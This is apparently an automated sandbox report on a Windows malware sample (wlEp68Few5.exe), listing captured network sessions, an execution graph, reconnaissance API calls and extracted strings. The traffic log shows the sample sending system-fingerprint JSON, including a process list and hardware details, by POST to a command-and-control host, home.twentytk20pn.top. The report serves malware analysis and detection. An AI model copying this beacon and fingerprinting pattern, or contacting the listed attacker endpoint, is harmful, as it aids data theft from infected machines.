Data Ascii: { "ip": "8.46.123.189", "current_time": "1734593609", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 19, 2024 08:33:33.450408936 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49738 | 194.87.47.113 | 80 | 5960 | C:\Users\user\Desktop\wlEp68Few5.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:33:34.301673889 CET | 287 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
Host: home.twentytk20pn.top
Accept: */*
Content-Type: application/json
Content-Length: 143
Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 19, 2024 08:33:35.626431942 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49721 | 98.85.100.80 | 443 | 5960 | C:\Users\user\Desktop\wlEp68Few5.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 07:33:30 UTC | 52 | OUT | GET /ip HTTP/1.1
Host: httpbin.org
Accept: */*
2024-12-19 07:33:30 UTC | 224 | IN | HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 07:33:30 GMT
Content-Type: application/json
Content-Length: 31
Connection: close
Server: gunicorn/19.9.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
2024-12-19 07:33:30 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
Data Ascii: { "origin": "8.46.123.189"}



Target ID: 0
Start time: 02:33:24
Start date: 19/12/2024
Path: C:\Users\user\Desktop\wlEp68Few5.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\wlEp68Few5.exe"
Imagebase: 0x470000
File size: 4'474'880 bytes
MD5 hash: 8CD346FC831E7D59EBAB0DE045018B84
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 4.1%
Dynamic/Decrypted Code Coverage: 43.7%
Signature Coverage: 9.9%
Total number of Nodes: 513
Total number of Limit Nodes: 50
87093 7100bcf 87092->87093 87094 7100cbc GetLogicalDrives 87093->87094 87095 7100ca9 GetLogicalDrives 87094->87095 87097 7100d35 87095->87097 87099 71008eb 87098->87099 87101 710094e 87098->87101 87100 7100bd2 2 API calls 87100->87101 87101->87100 87102 7100bcf 87101->87102 87103 7100cbc GetLogicalDrives 87102->87103 87104 7100ca9 GetLogicalDrives 87103->87104 87106 7100d35 87104->87106 87108 7100ca3 87107->87108 87109 7100cbc GetLogicalDrives 87108->87109 87110 7100ca9 GetLogicalDrives 87109->87110 87112 7100d35 87110->87112 87115 7100b55 87113->87115 87114 7100bd2 2 API calls 87114->87115 87115->87114 87116 7100bcf 87115->87116 87117 7100cbc GetLogicalDrives 87116->87117 87118 7100ca9 GetLogicalDrives 87117->87118 87120 7100d35 87118->87120 87122 7100ccd GetLogicalDrives 87121->87122 87124 7100d35 87122->87124 87127 7100b06 87125->87127 87126 7100bd2 2 API calls 87126->87127 87127->87126 87128 7100bcf 87127->87128 87129 7100cbc GetLogicalDrives 87128->87129 87130 7100ca9 GetLogicalDrives 87129->87130 87132 7100d35 87130->87132 87136 7100a60 87133->87136 87134 71009fa 87134->86910 87135 7100bd2 2 API calls 87135->87136 87136->87134 87136->87135 87137 7100bcf 87136->87137 87138 7100cbc GetLogicalDrives 87137->87138 87139 7100ca9 GetLogicalDrives 87138->87139 87141 7100d35 87139->87141 87144 7100a49 87142->87144 87143 7100bd2 2 API calls 87143->87144 87144->87143 87145 7100bcf 87144->87145 87146 7100cbc GetLogicalDrives 87145->87146 87147 7100ca9 GetLogicalDrives 87146->87147 87149 7100d35 87147->87149 87152 7100a32 87150->87152 87151 7100bd2 2 API calls 87151->87152 87152->87151 87153 7100bcf 87152->87153 87154 7100cbc GetLogicalDrives 87153->87154 87155 7100ca9 GetLogicalDrives 87154->87155 87157 7100d35 87155->87157 87160 7100b62 87158->87160 87159 7100bd2 2 API calls 87159->87160 87160->87159 87161 7100bcf 87160->87161 87162 7100cbc GetLogicalDrives 87161->87162 87163 7100ca9 GetLogicalDrives 87162->87163 87165 7100d35 87163->87165 87167 7100969 87166->87167 
87168 7100bd2 2 API calls 87167->87168 87169 7100bcf 87167->87169 87168->87167 87170 7100cbc GetLogicalDrives 87169->87170 87171 7100ca9 GetLogicalDrives 87170->87171 87173 7100d35 87171->87173 87175 7100cdd GetLogicalDrives 87174->87175 87177 7100d35 87175->87177 87180 71009d7 87178->87180 87179 7100bd2 2 API calls 87179->87180 87180->87179 87181 7100bcf 87180->87181 87182 7100cbc GetLogicalDrives 87181->87182 87183 7100ca9 GetLogicalDrives 87182->87183 87185 7100d35 87183->87185 87187 7100be4 87186->87187 87188 7100cbc GetLogicalDrives 87187->87188 87189 7100ca9 GetLogicalDrives 87188->87189 87191 7100d35 87189->87191 87194 7100ab0 87192->87194 87193 7100bd2 2 API calls 87193->87194 87194->87193 87195 7100bcf 87194->87195 87196 7100cbc GetLogicalDrives 87195->87196 87197 7100ca9 GetLogicalDrives 87196->87197 87199 7100d35 87197->87199 87202 7100b8d 87200->87202 87201 7100bd2 2 API calls 87201->87202 87202->87201 87203 7100bcf 87202->87203 87204 7100cbc GetLogicalDrives 87203->87204 87205 7100ca9 GetLogicalDrives 87204->87205 87207 7100d35 87205->87207 87208 4a8b50 87209 4a8b6b 87208->87209 87227 4a8bb5 87208->87227 87210 4a8b8f 87209->87210 87211 4a8bf3 87209->87211 87209->87227 87247 486e40 select 87210->87247 87228 4aa550 87211->87228 87214 4a8bfc 87218 4a8c1f connect 87214->87218 87222 4a8c35 87214->87222 87226 4a8cb2 87214->87226 87214->87227 87215 4a8ba1 87216 4a8cd9 SleepEx getsockopt 87215->87216 87215->87226 87215->87227 87219 4a8d18 87216->87219 87217 4aa150 getsockname 87225 4a8dff 87217->87225 87218->87222 87221 4a8d43 87219->87221 87219->87226 87224 4aa150 getsockname 87221->87224 87243 4aa150 87222->87243 87224->87227 87225->87227 87248 4778b0 closesocket 87225->87248 87226->87217 87226->87225 87226->87227 87229 4aa575 87228->87229 87232 4aa597 87229->87232 87250 4775e0 87229->87250 87231 4778b0 closesocket 87234 4aa713 87231->87234 87233 4aa811 setsockopt 87232->87233 87239 4aa83b 87232->87239 87241 4aa69b 87232->87241 87233->87239 87234->87214 
87236 4aaf56 87237 4aaf5d 87236->87237 87236->87241 87237->87234 87238 4aa150 getsockname 87237->87238 87238->87234 87239->87241 87242 4aabe1 87239->87242 87256 4a6be0 8 API calls 87239->87256 87241->87231 87241->87234 87242->87241 87255 4d67e0 ioctlsocket 87242->87255 87244 4aa15f 87243->87244 87246 4aa1d0 87243->87246 87245 4aa181 getsockname 87244->87245 87244->87246 87245->87246 87246->87215 87247->87215 87249 4778c5 87248->87249 87249->87227 87251 477607 socket 87250->87251 87252 4775ef 87250->87252 87253 47762b 87251->87253 87252->87251 87254 477643 87252->87254 87253->87232 87254->87232 87255->87236 87256->87242 87356 8ad270 87358 8ad29a 87356->87358 87357 8ad2a6 87358->87357 87361 8012a0 87358->87361 87360 8ad2da 87362 8012ac 87361->87362 87365 7fe030 87362->87365 87364 8012da 87364->87360 87368 7fe07d 87365->87368 87366 7fe16e 87366->87364 87367 7ffe96 isxdigit 87367->87368 87368->87366 87368->87367 87369 4a95b0 87370 4a95c8 87369->87370 87372 4a95fd 87369->87372 87371 4aa150 getsockname 87370->87371 87370->87372 87371->87372 87373 4a6ab0 87374 4a6ad5 87373->87374 87375 4a6bb4 87374->87375 87376 486fa0 select 87374->87376 87377 525ed0 7 API calls 87375->87377 87379 4a6b54 87376->87379 87378 4a6ba9 87377->87378 87379->87375 87379->87378 87380 4a6b5d 87379->87380 87380->87378 87382 525ed0 87380->87382 87385 525a50 87382->87385 87384 525ee5 87384->87380 87386 525a58 87385->87386 87390 525ea0 87385->87390 87387 525b50 87386->87387 87395 525b88 87386->87395 87398 525a99 87386->87398 87391 525eb4 87387->87391 87392 525b7a 87387->87392 87387->87395 87388 525e96 87418 539480 socket ioctlsocket connect getsockname closesocket 87388->87418 87390->87384 87419 526f10 socket ioctlsocket connect getsockname closesocket 87391->87419 87408 5270a0 87392->87408 87402 525cae 87395->87402 87416 525ef0 socket ioctlsocket connect getsockname 87395->87416 87396 525ec2 87396->87396 87398->87395 87401 5270a0 6 API calls 87398->87401 87415 526f10 socket ioctlsocket connect 
getsockname closesocket 87398->87415 87401->87398 87402->87388 87404 53a920 87402->87404 87417 539320 socket ioctlsocket connect getsockname closesocket 87402->87417 87405 53a944 87404->87405 87406 53a977 send 87405->87406 87407 53a94b 87405->87407 87406->87402 87407->87402 87409 5270ae 87408->87409 87411 52717f 87409->87411 87414 5271a7 87409->87414 87420 53a8c0 87409->87420 87424 5271c0 socket ioctlsocket connect getsockname 87409->87424 87411->87414 87425 539320 socket ioctlsocket connect getsockname closesocket 87411->87425 87414->87395 87415->87398 87416->87395 87417->87402 87418->87390 87419->87396 87421 53a903 recvfrom 87420->87421 87422 53a8e6 87420->87422 87423 53a8ed 87421->87423 87422->87421 87422->87423 87423->87409 87424->87409 87425->87414 87257 7fb160 Sleep
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                      • API String ID: 0-1590685507
                                                      • Opcode ID: d760fcf5603b9c509ab6c3a2745adbaaa546acd31db4da9d07118024fddd4229
                                                      • Instruction ID: 0c78b02454303c27a70e9d98288dec01d8c49093c829f727dda39f401a8599c2
                                                      • Opcode Fuzzy Hash: d760fcf5603b9c509ab6c3a2745adbaaa546acd31db4da9d07118024fddd4229
                                                      • Instruction Fuzzy Hash: 84C2C031A043449FD724CF69C480B6BB7E1BF99314F09866EEC888B352D335E989CB85

                                                      Control-flow Graph
                                                      [control_flow_graph for the function at 47255d: rendered edge data and executed/not-executed legend omitted. Basic blocks on this graph call GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW and FindNextFileW, plus a set of helper routines in the 7100928-7100d0c range dispatched from 472619.]
                                                      APIs
                                                      • GetSystemInfo.KERNELBASE ref: 00472579
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 004725CC
                                                      • GetDriveTypeA.KERNELBASE ref: 00472647
                                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 0047267E
                                                      • KiUserCallbackDispatcher.NTDLL ref: 004727E2
                                                      • FindFirstFileW.KERNELBASE ref: 004728F8
                                                      • FindNextFileW.KERNELBASE ref: 0047291F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                      • String ID: ;%G$@$`
                                                      • API String ID: 3271271169-3612974686
                                                      • Opcode ID: 71850e9463d179a95c6761790fb3fcf87ddaeff6e42d1c7731b064a4f7f9c230
                                                      • Instruction ID: e7513239ddc6845107b67b51a6d746a67a69f98c0cf0ed618eb08f9f60961041
                                                      • Opcode Fuzzy Hash: 71850e9463d179a95c6761790fb3fcf87ddaeff6e42d1c7731b064a4f7f9c230
                                                      • Instruction Fuzzy Hash: 05D1C1B49053199FDB50EFA8C98569EBBF0FF48344F008969E998D7311E7749A84CF82

                                                      Control-flow Graph
                                                      [control_flow_graph for the function at 4729ff: rendered edge data and executed/not-executed legend omitted. Basic blocks on this graph call FindFirstFileA, RegOpenKeyExA, CharUpperA, QueryFullProcessImageNameA and CloseHandle.]
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                      • String ID: 0
                                                      • API String ID: 2406880114-4108050209
                                                      • Opcode ID: 81f6a6d078687963e269d14eb3a5aeb464513e0ca4c4701bed15eba2937b153f
                                                      • Instruction ID: 1cc41ac7e66024b23b9ad269a699f310ef820fe31a5a7fd60e6260f4ebbcd13b
                                                      • Opcode Fuzzy Hash: 81f6a6d078687963e269d14eb3a5aeb464513e0ca4c4701bed15eba2937b153f
                                                      • Instruction Fuzzy Hash: 86E1E6B09043199FDB50EF68D98469EBBF4EF44300F00886AE588DB355E778DA89CF42

                                                      Control-flow Graph
                                                      [control_flow_graph for the function at 4805b0: rendered edge data and executed/not-executed legend omitted. Basic blocks on this graph call WSAEventSelect and WSAEnumNetworkEvents.]
                                                      APIs
                                                      • WSAEventSelect.WS2_32(?,?,?), ref: 00480712
                                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 004809DC
                                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004809FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: EventSelect$EnumEventsNetwork
                                                      • String ID: N=G$multi.c
                                                      • API String ID: 2170980988-617635166
                                                      • Opcode ID: f9fb3359683aaef8124c5bf2bd3f9e435e0dcf3cd6f797f35732b27305f98db9
                                                      • Instruction ID: 2a30029913b455d5f4737f1aec3d02f32a424f29dbcee296e439310ab09479f5
                                                      • Opcode Fuzzy Hash: f9fb3359683aaef8124c5bf2bd3f9e435e0dcf3cd6f797f35732b27305f98db9
                                                      • Instruction Fuzzy Hash: 6FD1CE716183419BE750EF60C881BAFB7E8BF94308F044C2EF88592251E778E949CB96
                                                      APIs
                                                      • getsockname.WS2_32(-00000020,-00000020,?), ref: 0053B2B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: ares__sortaddrinfo.c$cur != NULL
                                                      • API String ID: 3358416759-2430778319
                                                      • Opcode ID: 39cf8dd2a3b011ebabfb6f2608dc029ed0789e7613ca4d3ce0b951c174a47d0e
                                                      • Instruction ID: f332aad5fa96d90a5326f9c78f1910b975ae47a6bb8f343de4e7da5f251cc9c9
                                                      • Opcode Fuzzy Hash: 39cf8dd2a3b011ebabfb6f2608dc029ed0789e7613ca4d3ce0b951c174a47d0e
                                                      • Instruction Fuzzy Hash: E1C183716043159FEB18DF24C895A6A7BE1FF88314F05896CFA498B3A2E731ED45CB81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d55a2f38fbe2487eb538e08078b84136660ba2af078799b7cb078d6496efa1ba
                                                      • Instruction ID: 8e63db31dd5f9c7009cb2b06b3269094d0816b6800dbcb224c556a413f93f74f
                                                      • Opcode Fuzzy Hash: d55a2f38fbe2487eb538e08078b84136660ba2af078799b7cb078d6496efa1ba
                                                      • Instruction Fuzzy Hash: DF91E43060D3094BD335AA2888A47BF72D5EBC5364F348F2EE9A9422D4E778DC41D796
                                                      APIs
                                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0052712E,?,?,?,00001001,00000000), ref: 0053A90C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: recvfrom
                                                      • String ID:
                                                      • API String ID: 846543921-0
                                                      • Opcode ID: 69ee3dd1748738ff4e4eaa8236fd3ed06b2bed19af7c91dbf8ea2059b4499e29
                                                      • Instruction ID: fa0282d1011ad652ddc3b7849d2a59583e004c2be674f6e9c8d0654f56c364c2
                                                      • Opcode Fuzzy Hash: 69ee3dd1748738ff4e4eaa8236fd3ed06b2bed19af7c91dbf8ea2059b4499e29
                                                      • Instruction Fuzzy Hash: BAF01D76109348AFD2209F41DC44E6BBBEDFFC9754F05496DF998232119271AE10CAB2
                                                      APIs
                                                      • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0052A499
                                                      • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0052A4FB
                                                      • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0052A531
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0052AA19
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0052AA4C
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0052AA97
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0052AAE9
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0052AB30
                                                      • RegCloseKey.KERNELBASE(?), ref: 0052AB6A
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0052AB82
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0052AC46
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0052AD0A
                                                      • RegEnumKeyExA.KERNELBASE ref: 0052AD8D
                                                      • RegCloseKey.KERNELBASE(?), ref: 0052ADD9
                                                      • RegEnumKeyExA.KERNELBASE ref: 0052AE08
                                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0052AE2A
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0052AE54
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0052AF63
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0052AFB2
                                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0052B072
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                      • API String ID: 4281207131-1047472027
                                                      • Opcode ID: eb9c337e54244f796449d7026a7f296415f85969ec4f986f7ae5748ee99fbc2b
                                                      • Instruction ID: 30f694213e758ec880fb5e59c963ec9da2aad75c10b6ea3b6a127256a646fb59
                                                      • Opcode Fuzzy Hash: eb9c337e54244f796449d7026a7f296415f85969ec4f986f7ae5748ee99fbc2b
                                                      • Instruction Fuzzy Hash: 3572ADB1604311AFE720DB24DC85B6BBBE8BF86744F144828F989DB291E771E944CB53
                                                      APIs
                                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 004AA832
                                                      Strings
                                                      • Could not set TCP_NODELAY: %s, xrefs: 004AA871
                                                      • Bind to local port %d failed, trying next, xrefs: 004AAFE5
                                                      • Trying %s:%d..., xrefs: 004AA7C2, 004AA7DE
                                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 004AAE1F
                                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 004AA6CE
                                                      • Local Interface %s is ip %s using address family %i, xrefs: 004AAE60
                                                      • cf_socket_open() -> %d, fd=%d, xrefs: 004AA796
                                                      • bind failed with errno %d: %s, xrefs: 004AB080
                                                      • Trying [%s]:%d..., xrefs: 004AA689
                                                      • Local port: %hu, xrefs: 004AAF28
                                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 004AAD0A
                                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 004AADAC
                                                      • @, xrefs: 004AA8F4
                                                      • cf-socket.c, xrefs: 004AA5CD, 004AA735
                                                      • @, xrefs: 004AAC42
